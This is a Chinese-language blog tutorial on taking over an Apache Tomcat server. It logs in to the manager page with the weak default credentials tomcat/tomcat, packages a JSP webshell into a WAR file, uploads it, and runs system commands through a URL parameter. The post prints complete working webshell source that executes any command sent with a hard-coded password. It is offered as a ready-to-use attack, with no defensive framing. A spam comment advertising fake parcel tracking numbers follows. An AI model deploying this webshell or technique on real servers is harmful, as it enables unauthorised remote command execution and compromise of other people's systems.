【教程】tomcat Getshell

日期:2019-10-31 KING web渗透 浏览:81164次 评论:1条

tomcat Getshell


Tomcat是Apache 软件基金会(Apache Software Foundation)的Jakarta 项目中的一个核心项目,由Apache、Sun 和其他一些公司及个人共同开发而成。由于有了Sun 的参与和支持,最新的Servlet 和JSP 规范总是能在Tomcat 中得到体现,Tomcat 5支持最新的Servlet 2.4 和JSP 2.0 规范。因为Tomcat 技术先进、性能稳定,而且免费,因而深受Java 爱好者的喜爱并得到了部分软件开发商的认可,成为目前比较流行的Web 应用服务器。

1.使用弱口令登录tomcat 

tomcat  //账号密码相同

0.png

2.访问文件上传页面 

http://172.16.84.128:8180/manager/html

2.png

3.制作war格式木马并上传 

jar -cvf 1.war hx.jsp
//1.war为制作完成的马,hx.jsp为jsp一句话
2019-11-01 15-35-20 的屏幕截图.png

4.访问一句话马 

http://172.16.91.128:8180/1/hx.jsp?pwd=pass&i=ifconfig
//pass为连接密码,ifconfig为执行的系统命令
2019-11-01 15-40-14 的屏幕截图.png

5.jsp马分享 

<%
    if("pass".equals(request.getParameter("pwd"))){
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
        int a = -1;
        byte[] b = new byte[2048];
        out.print("<pre>");
        while((a=in.read(b))!=-1){
            out.println(new String(b));
        }
        out.print("</pre>");
    }
%>



本博客所有文章如无特别注明均为原创。作者:KING复制或转载请以超链接形式注明转自 千世博客
原文地址《【教程】tomcat Getshell
分享到:更多
标签: 一句话木马 文件上传

相关推荐

发表评论

路人甲 表情
看不清楚?点图切换 Ctrl+Enter快速提交

网友评论(1)

安全快递单号网 安全空包代发网站www.5adanhao.cn
yqll 5个月前 (2021-01-29) 回复